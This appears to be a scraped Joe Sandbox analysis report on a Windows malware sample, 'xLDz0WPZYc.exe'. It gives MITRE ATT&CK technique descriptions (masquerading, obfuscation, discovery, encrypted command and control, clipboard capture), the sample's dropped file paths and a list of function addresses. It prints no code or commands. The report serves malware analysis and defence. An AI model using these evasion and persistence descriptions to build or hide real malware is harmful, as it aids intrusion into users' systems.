Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xLDz0WPZYc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Settings.ini

C:\Users\user\AppData\Local\Temp\nsc746D.tmp

C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsh7577.tmp

C:\Users\user\AppData\Local\Temp\nsl7286.tmp

C:\Users\user\AppData\Local\Temp\nso7A7A.tmp

C:\Users\user\AppData\Local\Temp\nst7960.tmp

C:\Users\user\AppData\Roaming\Studerekammermenneskes\Carida.Cau

C:\Users\user\AppData\Roaming\Studerekammermenneskes\Lothar.unl

C:\Users\user\AppData\Roaming\Studerekammermenneskes\Turnoffs.Wei107

C:\Users\user\AppData\Roaming\Studerekammermenneskes\immaterials.met

C:\Users\user\AppData\Roaming\Studerekammermenneskes\pivalic.kon

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
xLDz0WPZYc.exe

Function 004030B6 Relevance: 77.3, APIs: 27, Strings: 17, Instructions: 337
stringfilecomCOMMON

Function 00404FE4 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405BDF Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Function 0040547D Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00406197 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 004039A0 Relevance: 61.6, APIs: 32, Strings: 3, Instructions: 345
windowstringCOMMON

Function 0040360E Relevance: 52.7, APIs: 16, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C29 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00404EA6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166
fileCOMMON

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Function 0040587D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON